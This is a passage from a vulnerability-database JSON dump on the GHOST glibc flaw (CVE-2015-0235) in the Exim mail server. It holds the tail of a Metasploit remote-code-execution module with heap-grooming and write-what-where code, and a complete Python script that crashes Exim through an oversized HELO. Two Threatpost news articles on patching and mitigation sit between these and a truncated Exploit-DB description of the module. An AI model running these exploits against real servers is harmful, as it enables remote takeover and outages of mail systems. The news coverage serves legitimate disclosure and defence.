print_debug(\"#{{ reply: reply }}\") if reply\r\n \r\n if reply and\r\n reply[:code] == \"550\" and\r\n # detect the parsed ACL, not the \"still in text form\" ACL (with \"=\")\r\n reply[:lines].join(\"\").delete(\"^=A-Za-z\") =~ /(\\A|[^=])#{message}/mn\r\n print_good(\"Brute-force SUCCESS\")\r\n print_good(\"Please wait for reply...\")\r\n # execute command this time, not acldrop\r\n reply = try_code_execution(helo_len, command, heap_addr + rand_offset)\r\n print_debug(\"#{{ reply: reply }}\")\r\n return handler\r\n end\r\n \r\n if not min_heap_addr\r\n if reply\r\n fail_with(\"codeexec\", \"no min_heap_addr\") if (max_heap_addr - heap_addr) >= MAX_HEAP_SIZE\r\n survived = heap_addr\r\n else\r\n if ((survived ? survived : max_heap_addr) - heap_addr) >= MIN_HEAP_SIZE\r\n # survived should point to our safe-zone at the beginning of the heap\r\n fail_with(\"codeexec\", \"never survived\") if not survived\r\n print_good \"Brute-forced min_heap_addr: #{survived.to_s(16)}\"\r\n min_heap_addr = survived\r\n end\r\n end\r\n end\r\n end\r\n \r\n heap_addr -= step_len\r\n break if min_heap_addr and heap_addr < min_heap_addr\r\n end\r\n \r\n break if step_len < 1024\r\n step_len /= 2\r\n end\r\n \r\n helo_len /= 2\r\n break if helo_len < 1024\r\n # ^ otherwise the 3 copies of sender_helo_name will\r\n # fit into the current_block of POOL_PERM memory\r\n end\r\n fail_with(\"codeexec\", \"Brute-force FAILURE\")\r\n end\r\n \r\n # our write-what-where primitive\r\n def try_code_execution(len, what, where)\r\n fail_with(\"codeexec\", \"#{what.length} >= #{len}\") if what.length >= len\r\n fail_with(\"codeexec\", \"#{where} < 0\") if where < 0\r\n \r\n x86 = (@leaked[:arch] == ARCH_X86)\r\n min_heap_shift = (x86 ? 512 : 768) # at least request2size(sizeof(FILE))\r\n heap_shift = min_heap_shift + rand(1024 - min_heap_shift)\r\n last_digit = 1 + rand(9)\r\n \r\n smtp_connect\r\n \r\n # fill smtp_cmd_buffer, smtp_data_buffer, and big_buffer with alpha chars\r\n smtp_send(\"MAIL FROM:\", \"\", method(:rand_text_alpha), \"<#{rand_text_alpha_upper(8)}>\", \"\", BIG_BUFFER_SIZE -\r\n \"501 : sender address must contain a domain\\r\\n\\0\".length)\r\n smtp_recv(501, 'sender address must contain a domain')\r\n \r\n smtp_send(\"RSET\")\r\n smtp_recv(250)\r\n \r\n # bulletproof Heap Feng Shui; the hard part is avoiding:\r\n # \"Too many syntax or protocol errors\" (3)\r\n # \"Too many unrecognized commands\" (3)\r\n # \"Too many nonmail commands\" (10)\r\n \r\n # / 5, because \"\\x7F\" is non-print, and:\r\n # ss = store_get(length + nonprintcount * 4 + 1);\r\n smtp_send(\"BAD1 \", \"\", \"\\x7F\", \"\", \"\", (19*1024 + heap_shift) / 5)\r\n smtp_recv(500, '\\A500 unrecognized command\\r\\n\\z')\r\n \r\n smtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 5*1024+13-1)\r\n smtp_recv(250)\r\n \r\n smtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 3*1024+13-1)\r\n smtp_recv(250)\r\n \r\n smtp_send(\"BAD2 \", \"\", \"\\x7F\", \"\", \"\", (13*1024 + 128) / 5)\r\n smtp_recv(500, '\\A500 unrecognized command\\r\\n\\z')\r\n \r\n smtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 3*1024+16+13-1)\r\n smtp_recv(250)\r\n \r\n # overflow (3 bytes) gethostbyname's buffer, and\r\n # overwrite its next_chunk's size field with 0x003?31\r\n # ^ last_digit\r\n smtp_send(\"EHLO \", \"\", \"0\", \".1#{last_digit}\", \"\", 5*1024+64+3-1)\r\n smtp_recv(HELO_CODES) # ^ 0x30 | PREV_INUSE\r\n \r\n # auth_xtextdecode() is the only way to overwrite the beginning of a\r\n # current_block of memory (the \"storeblock\" structure) with arbitrary data\r\n # (so that our hijacked \"next\" pointer can contain NUL, CR, LF characters).\r\n # this shapes the rest of our exploit: we overwrite the beginning of the\r\n # current_block of POOL_PERM memory with the current_block of POOL_MAIN\r\n # memory (allocated by auth_xtextdecode()).\r\n \r\n auth_prefix = rand_text_alpha(x86 ? 11264 : 11280)\r\n (x86 ? 4 : 8).times { |i| auth_prefix += sprintf(\"+%02x\", (where >> (i*8)) & 255) }\r\n auth_prefix += \".\"\r\n \r\n # also fill log_buffer with alpha chars\r\n smtp_send(\"MAIL FROM:<> AUTH=\", auth_prefix, method(:rand_text_alpha), \"+\", \"\", 0x3030)\r\n smtp_recv(501, 'invalid data for AUTH')\r\n \r\n smtp_send(\"HELO \", \"[1:2:3:4:5:6:7:8%eth0:\", \" \", \"#{what}]\", \"\", len)\r\n begin\r\n reply = smtp_recv(ANY_CODE)\r\n return reply if reply[:code] !~ /#{HELO_CODES}/\r\n return reply if reply[:code] != \"250\" and reply[:lines].first !~ /argument does not match calling host/\r\n \r\n smtp_send(\"MAIL FROM:<>\")\r\n reply = smtp_recv(ANY_CODE)\r\n return reply if reply[:code] != \"250\"\r\n \r\n smtp_send(\"RCPT TO:<postmaster>\")\r\n reply = smtp_recv\r\n return reply\r\n \r\n rescue\r\n return nil\r\n end\r\n \r\n ensure\r\n smtp_disconnect\r\n end\r\n \r\n DIGITS = '([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])'\r\n DOT = '[.]'\r\n \r\n def smtp_connect(exploiting = true)\r\n fail_with(\"smtp_connect\", \"sock isn't nil\") if sock\r\n \r\n connect\r\n fail_with(\"smtp_connect\", \"sock is nil\") if not sock\r\n @smtp_state = :recv\r\n \r\n banner = smtp_recv(220)\r\n return if not exploiting\r\n \r\n sender_host_address = datastore['SENDER_HOST_ADDRESS']\r\n if sender_host_address !~ /\\A#{DIGITS}#{DOT}#{DIGITS}#{DOT}#{DIGITS}#{DOT}#{DIGITS}\\z/\r\n fail_with(\"smtp_connect\", \"bad SENDER_HOST_ADDRESS (nil)\") if sender_host_address.nil?\r\n fail_with(\"smtp_connect\", \"bad SENDER_HOST_ADDRESS (not in IPv4 dotted-decimal notation)\")\r\n end\r\n sender_host_address_octal = \"0\" + $1.to_i.to_s(8) + \".#{$2}.#{$3}.#{$4}\"\r\n \r\n # turn helo_seen on (enable the MAIL command)\r\n # call smtp_verify_helo() (force fopen() and small malloc()s)\r\n # call host_find_byname() (force gethostbyname's initial 1024-byte malloc())\r\n smtp_send(\"HELO #{sender_host_address_octal}\")\r\n reply = smtp_recv(HELO_CODES)\r\n \r\n if reply[:code] != \"250\"\r\n fail_with(\"smtp_connect\", \"not Exim?\") if reply[:lines].first !~ /argument does not match calling host/\r\n fail_with(\"smtp_connect\", \"bad SENDER_HOST_ADDRESS (helo_verify_hosts)\")\r\n end\r\n \r\n if reply[:lines].first =~ /\\A250 (\\S*) Hello (.*) \\[(\\S*)\\]\\r\\n\\z/mn\r\n fail_with(\"smtp_connect\", \"bad SENDER_HOST_ADDRESS (helo_try_verify_hosts)\") if sender_host_address != $3\r\n smtp_active_hostname = $1\r\n sender_host_name = $2\r\n \r\n if sender_host_name =~ /\\A(.*) at (\\S*)\\z/mn\r\n sender_host_name = $2\r\n sender_ident = $1\r\n else\r\n sender_ident = nil\r\n end\r\n fail_with(\"smtp_connect\", \"bad SENDER_HOST_ADDRESS (no FCrDNS)\") if sender_host_name == sender_host_address_octal\r\n \r\n else\r\n # can't double-check sender_host_address here, so only for advanced users\r\n fail_with(\"smtp_connect\", \"user-supplied EHLO greeting\") unless datastore['I_KNOW_WHAT_I_AM_DOING']\r\n # worst-case scenario\r\n smtp_active_hostname = \"A\" * NS_MAXDNAME\r\n sender_host_name = \"A\" * NS_MAXDNAME\r\n sender_ident = \"A\" * 127 * 4 # sender_ident = string_printing(string_copyn(p, 127));\r\n end\r\n \r\n _sender = @sender\r\n @sender = {\r\n hostaddr: sender_host_address,\r\n hostaddr8: sender_host_address_octal,\r\n hostname: sender_host_name,\r\n ident: sender_ident,\r\n __smtp_active_hostname: smtp_active_hostname\r\n }\r\n fail_with(\"smtp_connect\", \"sender changed\") if _sender and _sender != @sender\r\n \r\n # avoid a future pathological case by forcing it now:\r\n # \"Do NOT free the first successor, if our current block has less than 256 bytes left.\"\r\n smtp_send(\"MAIL FROM:\", \"<\", method(:rand_text_alpha), \">\", \"\", STOREPOOL_MIN_SIZE + 16)\r\n smtp_recv(501, 'sender address must contain a domain')\r\n \r\n smtp_send(\"RSET\")\r\n smtp_recv(250, 'Reset OK')\r\n end\r\n \r\n def smtp_send(prefix, arg_prefix = nil, arg_pattern = nil, arg_suffix = nil, suffix = nil, arg_length = nil)\r\n fail_with(\"smtp_send\", \"state is #{@smtp_state}\") if @smtp_state != :send\r\n @smtp_state = :sending\r\n \r\n if not arg_pattern\r\n fail_with(\"smtp_send\", \"prefix is nil\") if not prefix\r\n fail_with(\"smtp_send\", \"param isn't nil\") if arg_prefix or arg_suffix or suffix or arg_length\r\n command = prefix\r\n \r\n else\r\n fail_with(\"smtp_send\", \"param is nil\") unless prefix and arg_prefix and arg_suffix and suffix and arg_length\r\n length = arg_length - arg_prefix.length - arg_suffix.length\r\n fail_with(\"smtp_send\", \"len is #{length}\") if length <= 0\r\n argument = arg_prefix\r\n case arg_pattern\r\n when String\r\n argument += arg_pattern * (length / arg_pattern.length)\r\n argument += arg_pattern[0, length % arg_pattern.length]\r\n when Method\r\n argument += arg_pattern.call(length)\r\n end\r\n argument += arg_suffix\r\n fail_with(\"smtp_send\", \"arglen is #{argument.length}, not #{arg_length}\") if argument.length != arg_length\r\n command = prefix + argument + suffix\r\n end\r\n \r\n fail_with(\"smtp_send\", \"invalid char in cmd\") if command.count(\"^\\x20-\\x7F\") > 0\r\n fail_with(\"smtp_send\", \"cmdlen is #{command.length}\") if command.length > SMTP_CMD_BUFFER_SIZE\r\n command += \"\\n\" # RFC says CRLF, but squeeze as many chars as possible in smtp_cmd_buffer\r\n \r\n # the following loop works around a bug in the put() method:\r\n # \"while (send_idx < send_len)\" should be \"while (send_idx < buf.length)\"\r\n # (or send_idx and/or send_len could be removed altogether, like here)\r\n \r\n while command and not command.empty?\r\n num_sent = sock.put(command)\r\n fail_with(\"smtp_send\", \"sent is #{num_sent}\") if num_sent <= 0\r\n fail_with(\"smtp_send\", \"sent is #{num_sent}, greater than #{command.length}\") if num_sent > command.length\r\n command = command[num_sent..-1]\r\n end\r\n \r\n @smtp_state = :recv\r\n end\r\n \r\n def smtp_recv(expected_code = nil, expected_data = nil)\r\n fail_with(\"smtp_recv\", \"state is #{@smtp_state}\") if @smtp_state != :recv\r\n @smtp_state = :recving\r\n \r\n failure = catch(:failure) do\r\n \r\n # parse SMTP replies very carefully (the information\r\n # leak injects arbitrary data into multiline replies)\r\n \r\n data = \"\"\r\n while data !~ /(\\A|\\r\\n)[0-9]{3}[ ].*\\r\\n\\z/mn\r\n begin\r\n more_data = sock.get_once\r\n rescue\r\n throw(:failure, \"Caught #{$!.class}: #{$!.message}\")\r\n end\r\n throw(:failure, \"no more data\") if more_data.nil?\r\n throw(:failure, \"no more data\") if more_data.empty?\r\n data += more_data\r\n end\r\n \r\n throw(:failure, \"malformed reply (count)\") if data.count(\"\\0\") > 0\r\n lines = data.scan(/(?:\\A|\\r\\n)[0-9]{3}[ -].*?(?=\\r\\n(?=[0-9]{3}[ -]|\\z))/mn)\r\n throw(:failure, \"malformed reply (empty)\") if lines.empty?\r\n \r\n code = nil\r\n lines.size.times do |i|\r\n lines[i].sub!(/\\A\\r\\n/mn, \"\")\r\n lines[i] += \"\\r\\n\"\r\n \r\n if i == 0\r\n code = lines[i][0,3]\r\n throw(:failure, \"bad code\") if code !~ /\\A[0-9]{3}\\z/mn\r\n if expected_code and code !~ /\\A(#{expected_code})\\z/mn\r\n throw(:failure, \"unexpected #{code}, expected #{expected_code}\")\r\n end\r\n end\r\n \r\n line_begins_with = lines[i][0,4]\r\n line_should_begin_with = code + (i == lines.size-1 ? \" \" : \"-\")\r\n \r\n if line_begins_with != line_should_begin_with\r\n throw(:failure, \"line begins with #{line_begins_with}, \" \\\r\n \"should begin with #{line_should_begin_with}\")\r\n end\r\n end\r\n \r\n throw(:failure, \"malformed reply (join)\") if lines.join(\"\") != data\r\n if expected_data and data !~ /#{expected_data}/mn\r\n throw(:failure, \"unexpected data\")\r\n end\r\n \r\n reply = { code: code, lines: lines }\r\n @smtp_state = :send\r\n return reply\r\n end\r\n \r\n fail_with(\"smtp_recv\", \"#{failure}\") if expected_code\r\n return nil\r\n end\r\n \r\n def smtp_disconnect\r\n disconnect if sock\r\n fail_with(\"smtp_disconnect\", \"sock isn't nil\") if sock\r\n @smtp_state = :disconnected\r\n end\r\nend\n\n# 0day.today [2018-01-10] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/23392"}, {"lastseen": "2018-01-01T20:59:43", "bulletinFamily": "exploit", "description": "Exim ESTMP denial of service exploit that leverages the GHOST glibc gethostbyname buffer overflow.", "modified": "2015-01-29T00:00:00", "published": "2015-01-29T00:00:00", "id": "1337DAY-ID-23215", "href": "https://0day.today/exploit/description/23215", "type": "zdt", "title": "Exim ESMTP GHOST Denial Of Service Exploit", "sourceData": "The below script is a PoC exploit for the GHOST vulnerability affecting Exim SMTP servers resulting in a service crash.\r\n\r\n#!/usr/bin/python\r\n# Exim ESMTP DoS Exploit by 1N3 v20150128\r\n# CVE-2015-0235 GHOST glibc gethostbyname buffer overflow\r\n# http://crowdshield.com\r\n#\r\n# USAGE: python ghost-smtp-dos.py <ip> <port>\r\n#\r\n# Escape character is '^]'.\r\n# 220 debian-7-7-64b ESMTP Exim 4.80 ...\r\n# HELO\r\n# 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\r\n 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\r\n# Connection closed by foreign host.\r\n#\r\n# user () debian-7-7-64b:~$ dmesg\r\n# ...\r\n# [ 1715.842547] exim4[2562]: segfault at 7fabf1f0ecb8 ip 00007fabef31bd04 sp 00007fffb427d5b0 error 6 in\r\n# libc-2.13.so[7fabef2a2000+182000]\r\n\r\nimport socket\r\nimport time\r\nimport sys, getopt\r\n\r\ndef main(argv):\r\n argc = len(argv)\r\n\r\n if argc <= 1:\r\n print \"usage: %s <host>\" % (argv[0])\r\n sys.exit(0)\r\n\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n buffer = \"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\r\n 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\r\n target = argv[1] # SET TARGET\r\n port = argv[2] # SET PORT\r\n\r\n print \"(--==== Exim ESMTP DoS Exploit by 1N3 - https://crowdshield.com\"\r\n print \"(--==== Sending GHOST SMTP DoS to \" + target + \":\" + port + \" with length:\" +str(len(buffer))\r\n s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n connect=s.connect((target,int(port)))\r\n data = s.recv(1024)\r\n print \"CONNECTION: \" +data\r\n s.send('HELO ' + buffer + '\\r\\n')\r\n data = s.recv(1024)\r\n print \"received: \" +data\r\n s.send('EHLO ' + buffer + '\\r\\n')\r\n data = s.recv(1024)\r\n print \"received: \" +data\r\n s.close()\r\n\r\nmain(sys.argv)\n\n# 0day.today [2018-01-01] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/23215"}], "threatpost": [{"lastseen": "2018-10-06T22:57:28", "bulletinFamily": "info", "description": "There are some silver linings in the wake of yesterday\u2019s disclosure of the [Ghost vulnerability in the Gnu C library, glibc](<http://threatpost.com/ghost-glibc-remote-code-execution-vulnerability-affects-all-linux-systems/110679>), which affects all Linux systems and seemed to harken yet another Internet-wide vulnerability.\n\nFirst, the 15-year-old bug isn\u2019t the showstopper that the Shellshock vulnerability in Bash (Bourne Again Shell) or Heartbleed were. But that doesn\u2019t mean it won\u2019t require immediate patching. Perhaps most importantly, it seems to be fairly challenging to exploit, experts say. For now, only one major software package dependent on glibc, the Exim mail transfer agent, is in the direct line of fire. Researchers at [Qualys](<https://community.qualys.com/blogs/laws-of-vulnerabilities/2015/01/27/the-ghost-vulnerability>) who found the [Ghost vulnerability](<http://www.openwall.com/lists/oss-security/2015/01/27/9>) have a proof-of-concept developed specifically for the MTA, while other experts caution that it could be a matter of time before other bugs swim to the surface.\n\n\u201cSome of the services most likely to be affected would be MTAs such as Exim, plus a range of web-reachable network diagnostic tools sometimes relied on by system administrators (e.g., webpages that let you run \u2018ping\u2019 or \u2018traceroute\u2019),\u201d researcher Michal Zalewski told Threatpost. \u201cWhen it comes to client applications, browsers would be probably the most likely vector\u2014but the most popular ones are not believed to be vulnerable.\u201d\n\nZalewski, a long time bug hunter, was one of the first to find [additional security vulnerabilities in Bash](<http://threatpost.com/researcher-takes-wraps-off-two-undisclosed-shellshock-vulnerabilities-in-bash/108674>) after the emergence of Shellshock. He confirmed that a number of mitigations could stand in the way of an attacker successfully pulling off a Ghost attack.\n\n\u201cThe exploitation depends on being able to convince a program to perform a DNS lookup of a host name provided by the attacker,\u201d Zalewski said. \u201cThe lookup has to be done in a very particular way and must lack a couple of commonly-employed (but certainly not mandatory) sanity checks.\u201d\n\nGhost is a heap-based buffer overflow found in the __nss_hostname_digits_dots() function in glibc that could enable remote code execution. That particular function is used by the _gethostbyname function calls. The vulnerability affects glibc 2.2 through 2.17, but was patched in May 2013, though the patch was not labeled a security vulnerability and as a result may not have been widely deployed.\n\nIn addition to the patch, Qualys said that the gethostbyname functions are obsolete because of IPv6 and newer applications using a different call, getaddrinfo(). While the flaw is also exploitable locally, this scenario too is mitigated because many programs rely on gethostbyname only if another preliminary call fails and a secondary call succeeds in order to reach the overflow. The advisory said this is \u201cimpossible\u201d and those programs are safe.\n\nThere are mitigations against remote exploitation too, Qualys said. Servers, for example, use gethostbyname to perform full-circle reverse DNS checks. \u201cThese programs are generally safe because the hostname passed to gethostbyname() has normally been pre-validated by DNS software,\u201d the advisory.\n\n\u201cTo be clear, this is NOT the end of the Internet as we know it, nor is it another Heartbleed. In a general sense, it\u2019s not likely to be an easy bug to exploit,\u201d said Rapid7 CSO and Metasploit creator HD Moore. \u201cStill, it could potentially be nasty if exploited so we strongly recommend immediate patching and rebooting. Without a reboot, services using the old library will not be restarted.\u201d\n\nOne of the major challenges with patching Bash, for example, was that so many services made essentially covert Bash calls. It was a chore finding all of those services before deploying patches. With Ghost, patching figures to be a bit more streamlined with the quickest route to a fix being to deploy patches provided from the respective Linux distributions. Matasano Security today published an extensive [list of Linux distributions running vulnerable versions of glibc](<http://chargen.matasano.com/chargen/2015/1/27/vulnerability-overview-ghost-cve-2015-0235.html>).\n\nRapid7\u2019s Moore cautions that sysadmins must reboot systems in order for the patch to take effect.\n\n\u201cThis can lead to a false sense of security if the proper precautions are not followed,\u201d he said. \u201cGiven that Linux is used in all sorts of hardware products, it may take a while for the vendors to ship patches for affected appliances and devices. The silver lining is that most low-end embedded devices use a lightweight alternative to glibc (uClibc or Bionic) and are therefore not vulnerable in the first place.\u201d\n\nChris Wysopal, CTO and cofounder of application security company Veracode, said any servers compromised by Ghost exploits could be turned into bots used in DDoS attacks, or attackers can use the vulnerability to install malware that could lead to data loss.\n\n\u201cThis is yet another example, like Heartbleed and Shellshock, of a reusable open source component that is widely used and also quite vulnerable,\u201d Wysopal said. \u201cIn our research, we\u2019ve found that open-source components such as glibc introduce an average of 24 known vulnerabilities into each web application. GHOST won\u2019t be as widespread as Heartbleed and Shellshock, but it\u2019s widespread enough that IT operations teams at many companies are now scrambling to find all instances so they can patch them ASAP.\u201d\n\nThe good news is that like past Internet-wide bugs, Ghost may not spawn a new spree of spin-off bugs.\n\n\u201cGlibc plays a role in almost everything that a program can do, but in most cases, the functionality involved in interacting with untrusted parties is fairly simple and robust. The glibc DNS resolver is actually one of the few exceptions to this rule. It is a fairly complex piece of machinery, so we will probably hear about it again,\u201d Zalewski said. \u201cThat said, I would not expect a huge spike in glibc vulnerabilities just because of this particular find.\u201d\n", "modified": "2015-01-30T20:11:03", "published": "2015-01-28T13:28:29", "id": "THREATPOST:8B5C2D5280CC957CA9A4CB0C697F96D8", "href": "https://threatpost.com/of-ghost-glibc-vulnerability-patching-and-exploits/110719/", "type": "threatpost", "title": "Ghost glibc Vulnerability Patching and Exploits", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:29", "bulletinFamily": "info", "description": "A critical vulnerability has been found in glibc, the GNU C library, that affects all Linux systems dating back to 2000. Attackers can use this flaw to execute code and remotely gain control of Linux machines.\n\nThe issue stems from a heap-based buffer overflow found in the __nss_hostname_digits_dots() function in glibc. That particular function is used by the _gethostbyname function calls.\n\n\u201cA remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application,\u201d said an [advisory ](<https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2015-0235>)from Linux distributor Red Hat.\n\nThe vulnerability, CVE-2015-0235, has already been nicknamed GHOST because of its relation to the _gethostbyname function. Researchers at Qualys discovered the flaw, and say it goes back to glibc version 2.2 in Linux systems published in November 2000.\n\nAccording to Qualys, there is a mitigation for this issue that was published May 21, 2013 between patch glibc-2.17 versions and glibc-2.18.\n\n\u201cUnfortunately, it was not recognized as a security threat; as a result, most stable and long-term-support distributions were left exposed (and still are): Debian 7 (wheezy), Red Hat Enterprise Linux 6 & 7, CentOS 6 & 7, Ubuntu 12.04, for example,\u201d said an [advisory](<http://www.openwall.com/lists/oss-security/2015/01/27/9>) from Qualys posted to the OSS-Security mailing list.\n\nRespective Linux distributions will be releasing patches; Red Hat has released an [update](<https://rhn.redhat.com/errata/RHSA-2015-0090.html>) for Red Hat Enterprise Linux v.5 server. Novell has a [list](<http://support.novell.com/security/cve/CVE-2015-0235.html>) of SUSE Linux Enterprise Server builds affected by the vulnerability. Debian has already released an update of its software addressing the vulnerability.\n\n\u201cIt\u2019s everywhere, which is kind of the urgency we have here. This has been in glibc for a long time. It was fixed recently, but it was not marked as a security issue, so things that are fairly new should be OK,\u201d said Josh Bressers, a member of the Red Hat security response team. \u201cFrom a threat level, what it comes down to is a handful of stuff that\u2019s probably dangerous that uses this function.\u201d\n\nUnlike past [Internet-wide bugs such as Bash](<http://threatpost.com/major-bash-vulnerability-affects-linux-unix-mac-os-x/108521>), patching glibc may not be the chore it was with Bash since so many components made silent Bash calls.\n\n\u201cIn this instance, you just apply the glibc update, and restart any services that are vulnerable,\u201d Bressers said. \u201cIt\u2019s not confusing like Shellshock was.\u201d\n\nQualys, in its advisory, not only shares extremely in-depth technical information on the vulnerability, but also includes a section explaining exploitation of the Exim SMTP mail server. The advisory demonstrates how to bypass NX, or No-eXecute protection as well as glibc malloc hardening, Qualys said.\n\nQualys also said that in addition to the 2013 patch, other factors mitigate the impact of the vulnerability, including the fact that the gethostbyname functions are obsolete because of IPv6 and newer applications using a different call, getaddrinfo(). While the flaw is also exploitable locally, this scenario too is mitigated because many programs rely on gethostbyname only if another preliminary call fails and a secondary call succeeds in order to reach the overflow. The advisory said this is \u201cimpossible\u201d and those programs are safe.\n\nThere are mitigations against remote exploitation too, Qualys said. Servers, for example, use gethostbyname to perform full-circle reverse DNS checks. \u201cThese programs are generally safe because the hostname passed to gethostbyname() has normally been pre-validated by DNS software,\u201d the advisory.\n\n\u201cIt\u2019s not looking like a huge remote problem, right now,\u201d Bressers said.\n\nHowever, while the bug may have been dormant since 2000, there is no way to tell if criminals or government-sponsored hackers have been exploiting this vulnerability. Nor is there any way to tell what will happen once legitimate security researchers\u2014and black hats\u2014begin looking at the vulnerability now that it\u2019s out in the open. With Bash, for example, it didn\u2019t take long for [additional security issues to rise to the surface](<http://threatpost.com/researcher-takes-wraps-off-two-undisclosed-shellshock-vulnerabilities-in-bash/108674>).\n\n[_Image courtesy Michal Docekal _](<https://www.flickr.com/photos/lawmaker/>)\n", "modified": "2015-01-29T20:34:41", "published": "2015-01-27T12:55:29", "id": "THREATPOST:3A858BD40E6943BD3F4553301036091D", "href": "https://threatpost.com/ghost-glibc-remote-code-execution-vulnerability-affects-all-linux-systems/110679/", "type": "threatpost", "title": "GHOST glibc Linux Remote Code Execution Vulnerability", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-04T03:28:33", "bulletinFamily": "exploit", "description": "Exim GHOST (glibc gethostbyname) Buffer Overflow. CVE-2015-0235. Remote exploit for linux platform", "modified": "2015-03-18T00:00:00", "published": "2015-03-18T00:00:00", "id": "EDB-ID:36421", "href": "https://www.exploit-db.com/exploits/36421/", "type": "exploitdb", "title": "Exim GHOST glibc gethostbyname Buffer Overflow", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit4 < Msf::Exploit::Remote\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::Tcp\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Exim GHOST (glibc gethostbyname) Buffer Overflow',\r\n 'Description' => %q(\r\n This module remotely exploits CVE-2015-0235 (a.k.a. GHOST, a heap-based\r\n buffer overflow in the GNU C Library's gethostbyname functions) on x86\r\n and x86_64 GNU/Linux systems that run the Exim mail server. Technical\r\n information about the exploitation can be found in the original GHOST\r\n advisory, and in the source code of this module.\r\n ------------------------------------------------------------------------\r\n SERVER-SIDE REQUIREMENTS (Exim)\r\n ------------------------------------------------------------------------\r\n The remote system must use a vulnerable version of the GNU C Library:\r\n the first exploitable version is glibc-2.6, the last exploitable version\r\n is glibc-2.17; older versions might be exploitable too, but this module\r\n depends on the newer versions' fd_nextsize (a member of the malloc_chunk\r\n structure) to remotely obtain the address of Exim's smtp_cmd_buffer in\r\n the heap.\r\n ------------------------------------------------------------------------\r\n The remote system must run the Exim mail server: the first exploitable\r\n version is exim-4.77; older versions might be exploitable too, but this\r\n module depends on the newer versions' 16-KB smtp_cmd_buffer to reliably\r\n set up the heap as described in the GHOST advisory.\r\n ------------------------------------------------------------------------\r\n The remote Exim mail server must be configured to perform extra security\r\n checks against its SMTP clients: either the helo_try_verify_hosts or the\r\n helo_verify_hosts option must be enabled; the \"verify = helo\" ACL might\r\n be exploitable too, but is unpredictable and therefore not supported by\r\n this module.\r\n ------------------------------------------------------------------------\r\n CLIENT-SIDE REQUIREMENTS (Metasploit)\r\n ------------------------------------------------------------------------\r\n This module's \"exploit\" method requires the SENDER_HOST_ADDRESS option\r\n to be set to the IPv4 address of the SMTP client (Metasploit), as seen\r\n by the SMTP server (Exim); additionally, this IPv4 address must have\r\n both forward and reverse DNS entries that match each other\r\n (Forward-Confirmed reverse DNS).\r\n ------------------------------------------------------------------------\r\n The remote Exim server might be exploitable even if the Metasploit\r\n client has no FCrDNS, but this module depends on Exim's sender_host_name\r\n variable to be set in order to reliably control the state of the remote\r\n heap.\r\n ------------------------------------------------------------------------\r\n TROUBLESHOOTING\r\n ------------------------------------------------------------------------\r\n \"bad SENDER_HOST_ADDRESS (nil)\" failure: the SENDER_HOST_ADDRESS option\r\n was not specified.\r\n ------------------------------------------------------------------------\r\n \"bad SENDER_HOST_ADDRESS (not in IPv4 dotted-decimal notation)\" failure:\r\n the SENDER_HOST_ADDRESS option was specified, but not in IPv4\r\n dotted-decimal notation.\r\n ------------------------------------------------------------------------\r\n \"bad SENDER_HOST_ADDRESS (helo_verify_hosts)\" or\r\n \"bad SENDER_HOST_ADDRESS (helo_try_verify_hosts)\" failure: the\r\n SENDER_HOST_ADDRESS option does not match the IPv4 address of the SMTP\r\n client (Metasploit), as seen by the SMTP server (Exim).\r\n ------------------------------------------------------------------------\r\n \"bad SENDER_HOST_ADDRESS (no FCrDNS)\" failure: the IPv4 address of the\r\n SMTP client (Metasploit) has no Forward-Confirmed reverse DNS.\r\n ------------------------------------------------------------------------\r\n \"not vuln? 